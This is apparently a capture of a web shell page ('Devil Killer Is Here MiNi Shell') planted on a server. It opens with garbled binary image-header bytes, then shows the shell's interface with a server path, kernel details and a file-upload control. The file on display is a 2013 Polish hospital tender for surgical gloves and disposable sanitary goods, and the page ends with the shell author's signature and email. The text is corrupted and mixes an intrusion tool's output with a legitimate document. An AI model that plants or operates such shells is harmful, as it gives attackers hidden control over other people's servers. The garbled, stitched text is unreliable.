JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /proc/self/root/proc/self/root/home/vmanager/www/common/web/tenders/20130610/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : //proc/self/root/proc/self/root/home/vmanager/www/common/web/tenders/20130610/105169-N-2013.html

<p class="kh_header"><b>Końskie: Sukcesywne dostawy  rękawic chirurgicznych , rękawic diagnostycznych,  rękawic  jednorazowych ,  jednorazowych artykułów  sanitarnych  z pulpy celulozowej  wg  zadań  1 - 3 .</b><br>
<b>Numer ogłoszenia: 105169 - 2013; data zamieszczenia: 10.06.2013</b><br>
OGŁOSZENIE O ZAMÓWIENIU - dostawy<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Zespół Opieki  Zdrowotnej , ul.  Gimnazjalna 41B, 26-200 Końskie, woj. świętokrzyskie, tel. 041 3902314, faks 041 3902319.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.zoz.konskie.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Samodzielny publiczny zakład opieki zdrowotnej.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Sukcesywne dostawy  rękawic chirurgicznych , rękawic diagnostycznych,  rękawic  jednorazowych ,  jednorazowych artykułów  sanitarnych  z pulpy celulozowej  wg  zadań  1 - 3 ..</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> dostawy.</p>
<p><b>II.1.4) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> I. Rękawiczki chirurgiczne i diagnostyczne.  
1.	Rękawiczki chirurgiczne (sterylne) roz.6	 par.1 000
2.	Rękawiczki chirurgiczne (sterylne) roz.6,5	 par.4 200
3.	Rękawiczki chirurgiczne (sterylne) roz.7 	 par.5 400
4.	Rękawiczki chirurgiczne (sterylne) roz.7,5	 par.10 000
5.	Rękawiczki chirurgiczne (sterylne) roz.8   	 par.6 000
6.	Rękawiczki chirurgiczne (sterylne) roz.8,5	 par.3 600
7.	Rękawiczki chirurg. (sterylne) bezlateksowe roz. od 6,5 do 8   par. 1200
8.	Rękawiczki chirurg. (sterylne) bezpudrowe roz. 6,5. 	 par.	5 600
9.	Rękawiczki chirurg. (sterylne) bezpudrowe roz. 7.     	 par.	6 400
10.	Rękawiczki chirurg. (sterylne) bezpudrowe roz 7,5 	 par.	3 600
11.	Rękawiczki chirurg. (sterylne) bezpudrowe  roz. 8    	 par.	1 200
12.	Rękawiczki chirurg. (sterylne) bezpudrowe  roz. 8,5 	 par.	1 000
13.	Rękawiczki   diagnostyczne  zabiegowe do tzw. zabiegów wysokiego ryzyka, bezpudrowe, niejałowe, o grubszych ściankach, odporne na przekucia (grubość na palcu od 0,32-0,49 mm), teksturowane z lateksu kauczuku naturalnego lub nitrylowe z rolowanym brzegiem, kształt uniwersalny, w rozmiarach S, M, L, XL pakowane minimum 50 szt. - 100 szt.  op. (a. 100 szt.)120
14.	Rękawiczki diagnostyczne lateksowe lekko pudrowane skrobią kukurydzianą- mankiet rolowany, z warstwą zewnętrzną antypoślizgową o dowolnej strukturze (siateczkowa lub powierzchnia mikroteksturowana), warstwa antypoślizgowa min. na opuszkach palców i wewnętrznej powierzchni dłoni - opakowanie po 100 szt  w roz. S. (a.100szt.)   	op.6 000
15.	Rękawiczki diagnostyczne lateksowe lekko pudrowane skrobią kukurydzianą- mankiet rolowany, z warstwą zewnętrzną antypoślizgową o dowolnej strukturze (siateczkowa lub powierzchnia mikroteksturowana) min. na opuszkach palców i wewnętrznej powierzchni dłoni - opakowanie po 100 szt  w roz. M. (a.100szt.)  	 op.2 600
16.	Rękawiczki diagnostyczne lateksowe lekko pudrowane skrobią kukurydzianą- mankiet rolowany, z warstwą zewnętrzną antypoślizgową o dowolnej strukturze (siateczkowa lub powierzchnia mikroteksturowana) min. na opuszkach palców i wewnętrznej powierzchni dłoni - opakowanie po 100 szt  w roz. L. (a.100szt.)   op.800
17.	Rękawiczki diagnostyczne lateksowe bezpudrowe mankiet rolowany, z warstwą zewnętrzną antypoślizgową o dowolnej strukturze (siateczkowa lub powierzchnia mikroteksturowana) min. na opuszkach palców i wewnętrznej powierzchni dłoni - opakowanie po 100 szt  w roz. S. (a.100szt.)    op.2 800
18.Rękawiczki diagnostyczne lateksowe bezpudrowe mankiet rolowany, z warstwą zewnętrzną antypoślizgową o dowolnej strukturze (siateczkowa lub powierzchnia mikroteksturowana) min. na opuszkach palców i wewnętrznej powierzchni dłoni - opakowanie po 100 szt  w roz. M. (a.100szt.)    op.2 800
19.Rękawiczki diagnostyczne lateksowe  bezpudrowe mankiet rolowany, z warstwą zewnętrzną antypoślizgową o dowolnej strukturze (siateczkowa lub powierzchnia mikroteksturowana) min. na opuszkach palców i wewnętrznej powierzchni dłoni - opakowanie po 100 szt  w roz. L. (a.100szt.) op.240

II- Specjalistyczne rękawiczki  ratownicze, nitrylowe i winilowe.

1.Rękawice diagnostyczne o zwiekszonej odpornosci na rozerwanie do procedur o podwyższonym ryzyku, lateksowe, bezpudrowe, chlorowane. Grubość pojedynczej ścianki na palcu 0,40mm, dłoni 0,30mm, mankiecie 0,20mm, długość minimum 295mm, rozciągliwość przed starzeniem 900%. Zarejestrowane jako wyrób medyczny oraz środek ochrony osobistej, oznakowane  CE  na opakowaniu jednostkowym z numerem jednostki notyfikowanej, zgodnie z normą EN 455  - rozmiar L,  pakowane 50 szt.	op.(a.50 szt.)	40
2.Rękawiczki diagnostyczne lateksowe z opisem jak wyżej roz. M	op. (a. 50 szt.)	60
3.Rękawiczki diagnostyczne nitrylowe bezpudrowe, chlorowane od wewnątrz, polimerowane od  strony roboczej, o obniżonej grubości. Grubość pojedynczej ścianki na palcu 0,8mm, dłoni 0,07 mm, mankiecie 0,06 mm. Rolowany mankiet, teksturowane tylko na palcach, kolor ciemno niebieski. Zarejestrowane jako wyrób medyczny oraz środek ochrony osobistej. Zgodność z normami EN 455 1-2, EN 374-3 (min. 11 subst), ASTM F1671 potwierdzone badaniami z jednostki niezależnej od producenta. Informacje o odporności na poszczególne substancje chemiczne wypisane na opakowaniu. Dopuszczone do kontakty z żywnością, potwierdzone piktogramami na opakowaniu. Pozbawione tiuranów oraz MBT, potwierdzone badaniami HPLC z jednostki niezależnej . Rozmiar kodowany kolorystycznie na opakowaniu, długość min 240mm. op. a 200 sztuk.roz. S	op. (a. 200 szt.)	2 800
4.Rękawiczki diagnostyczne nitrylowe z opisem jak wyżej roz. M	op. (a. 200 szt.)	2 200
5.Rękawiczki diagnostyczne nitrylowe z opisem jak wyżej roz.L	op. (a. 200 szt.)	1 000
6.Rękawiczki winylowe bezpudrowe wolne od ftalanów, grubość pojedynczej ścianki na palcu 0,08mm +/-0,02, dłoń 0,08mm +/-0,02, mankiet 0,05mm +/-0,02, spełniają wymagania stawiane przez normy EN 455 część 1,2,3,4, roz.S (a.100szt.)	op. (a. 100 szt.)	1 000
7.Rękawiczki winylowe bezpudrowe z opisem jak wyżej roz. M	op. (a. 100 szt.)	1 200
8.Rękawiczki winylowe bezpudrowe z opisem jak wyżej roz. L 	op. (a. 100 szt.)	260

III - jednorazowe artykuły sanitarne  z pulpy celulozowej  
1.Baseny głębokie    szt. 2000
2.Baseny płaskie	szt. 7 000
3.Kaczki 900 mil	szt.  26 000
4.Miska prostokątna  lub okrągła o pojemności minimum 4 litrów , - nieprzemakająca  do 4 godzin szt. 7 000
5.Nerka	 szt. 18 000
6.Pokrywy do basenów głębokich	szt.  600
7.Pokrywy do basenów płaskich	szt.  800
8.Myjki jednorazowe sanitarne w roz około 14x20cm z włókniny nasaczonej środkiem myjącym o naturalnym PH  	 szt. 140 000.</p>

<p><b>II.1.6) Wspólny Słownik Zamówień (CPV):</b> 33.14.14.20-0, 18.42.43.00-0, 33.77.20.00-2.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty częściowej:</b> tak, liczba części: 3.</p>
<p><b>II.1.8) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Okres w miesiącach: 12.</p>
<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> 1. Zamawiający nie wymaga wniesienia wadium</p>
<p><b>III.2) ZALICZKI</b></p>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>- działalność prowadzona na potrzeby wykonania przedmiotu zamówienia w nie wymaga posiadania specjalnych uprawnień - Zamawiający uzna warunek za spełniony, jeżeli Wykonawca złoży oświadczenie o spełnianiu tego warunku (zał. Nr 3)</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie wyznacza szczegółowego warunku w tym zakresie. Zamawiający uzna warunek za spełniony, jeżeli Wykonawca złoży oświadczenie o spełnianiu tego warunku (zał. Nr 3)</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie wyznacza szczegółowego warunku w tym zakresie. Zamawiający uzna warunek za spełniony, jeżeli Wykonawca złoży oświadczenie o spełnianiu tego warunku (zał. Nr 3)</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie wyznacza szczegółowego warunku w tym zakresie. Zamawiający uzna warunek za spełniony, jeżeli Wykonawca złoży oświadczenie o spełnianiu tego warunku (zał. Nr 3)</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie wyznacza szczegółowego warunku w tym zakresie. Zamawiający uzna warunek za spełniony, jeżeli Wykonawca złoży oświadczenie o spełnianiu tego warunku (zał. Nr 3)</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnianiu warunków udziału w postępowaniu należy przedłożyć:</b></p>

<p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia;</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru lub z centralnej ewidencji i informacji o działalności gospodarczej, jeżeli odrębne przepisy wymagają wpisu do rejestru lub ewidencji, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego naczelnika urzędu skarbowego potwierdzające, że wykonawca nie zalega z opłacaniem podatków, lub zaświadczenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego oddziału Zakładu Ubezpieczeń Społecznych lub Kasy Rolniczego Ubezpieczenia Społecznego potwierdzające, że wykonawca nie zalega z opłacaniem składek na ubezpieczenia zdrowotne i społeczne, lub potwierdzenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu -  wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">aktualną informację z Krajowego Rejestru Karnego w zakresie określonym w art. 24 ust. 1 pkt 4-8 ustawy, wystawioną nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">aktualną informację z Krajowego Rejestru Karnego w zakresie określonym w art. 24 ust. 1 pkt 9 ustawy, wystawioną nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">aktualną informację z Krajowego Rejestru Karnego w zakresie określonym w art. 24 ust. 1 pkt 10 i 11 ustawy, wystawioną nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">wykonawca powołujący się przy wykazywaniu spełniania warunków udziału w postępowaniu na zasoby innych podmiotów, które będą brały udział w realizacji części zamówienia, przedkłada także dokumenty dotyczące tego podmiotu w zakresie wymaganym dla wykonawcy, określonym w pkt III.4.2.</li>

</ul>

<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">nie zalega z uiszczaniem podatków, opłat, składek na ubezpieczenie społeczne i zdrowotne albo że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawiony nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">nie orzeczono wobec niego zakazu ubiegania się o zamówienie - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul><p class="bold">III.4.3.2)</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">			
<li style="margin-bottom: 12px;">zaświadczenie właściwego organu sądowego lub administracyjnego miejsca zamieszkania albo zamieszkania osoby, której dokumenty dotyczą, w zakresie określonym w art. 24 ust. 1 pkt 4-8 - wystawione nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">zaświadczenie właściwego organu sądowego lub administracyjnego miejsca zamieszkania albo zamieszkania osoby, której dokumenty dotyczą, w zakresie określonym w art. 24 ust. 1 pkt 10 -11 ustawy - wystawione nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert.</li>

</ul><p class="bold">III.4.4)  Dokumenty dotyczące przynależności do tej samej grupy kapitałowej</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">			
<li style="margin-bottom: 12px;">lista podmiotów należących do tej samej grupy kapitałowej w rozumieniu ustawy z dnia 16 lutego 2007 r. o ochronie konkurencji i konsumentów albo informacji o tym, że nie należy do grupy kapitałowej;</li>

</ul><br><p class="bold">

III.5) INFORMACJA O DOKUMENTACH POTWIERDZAJĄCYCH, ŻE OFEROWANE DOSTAWY, USŁUGI LUB ROBOTY BUDOWLANE ODPOWIADAJĄ OKREŚLONYM WYMAGANIOM</p>
<p class="bold">W zakresie potwierdzenia, że oferowane roboty budowlane, dostawy lub usługi odpowiadają określonym wymaganiom należy przedłożyć:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc">
<li style="margin-bottom: 12px;"><p style="margin: 0px; padding: 0px;">inne dokumenty</p>
<p style="margin: 0px; padding: 0px;">Sporządzone przez Wykonawcę oświadczenie, że oferowane produkty spełniają wymagania określone  odpowiednimi przepisami  i są dopuszczone do stosowania i  obrotu na terenie RP -zgodnie z  Ustawą z dnia 20 maja 2010 r. o wyrobach medycznych DZ. U Nr 107  z dnia 17 czerwca 2010 r i  ROZPORZĄDZENIEM MINISTRA ZDROWIA Dz.U. z 2010 nr 215 poz. 1416  z dnia 5 listopada 2010 r. w sprawie sposobu klasyfikowania wyrobów medycznych .  

 Wraz z oświadczeniem należy załączyć kserokopie odpowiednich dokumentów potwierdzające spełnienie  wymogów przedmiotu zamówienia określonych  w załączniku  nr 2</p></li>



</ul>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b></p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>Zamawiający dopuszcza   zmiany   umowy w następujących przypadkach :
	a) - gdy podczas realizacji umowy wystąpią nieprzewidziane zdarzenia lub okoliczności które uniemożliwiają zrealizowanie przedmiotu zamówienia w sposób, w zakresie i w terminie przewidzianym w ofercie.
	b) - w przypadku zakończenia produkcji lub wycofania z rynku wyrobu będącego przedmiotem zamówienia dopuszcza się zmianę na nowy produkt o tych samych bądź lepszych parametrach po  cenie jednostkowej zaoferowanej w ofercie.
	c) - zmiany osób reprezentujących strony i odpowiedzialnych za  realizację postanowień umowy d) - zmiany rachunku bankowego i innych danych stron.
	e) -  w razie zmiany w  okresie obowiązywania umowy stawki podatku od towarów i usług, strony dopuszczają możliwość zmiany umowy w celu dostosowania jej treści do wprowadzonych zmian. Zmiana zostanie wprowadzona zgodnie z przepisami PZP i niniejszą umową Cena jednostkowa brutto dostarczonego asortymentu oraz wartość umowy  brutto podlega automatycznej waloryzacji, uwzględniającej zmianę wielkości podatku od towarów i usług - VAT. Powyższa zmiana obowiązuje  od dnia wprowadzenia urzędowej zmiany stawki VAT  i nie wymaga zachowania formy pisemnej - aneksu
 	f)- przedłużenia terminu obowiązywania umowy</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> http://zoz-konskie.bip.org.pl/<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Zespół Opieki Zdrowotnej,   ulica Gimnazjalna 41 B,   26-200 Końskie,  DSUiZP.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 18.06.2013 godzina 10:45, miejsce: Zespół Opieki Zdrowotnej,   ulica Gimnazjalna 41 B,   26-200 Końskie,   SEKRETARIAT.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>





<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com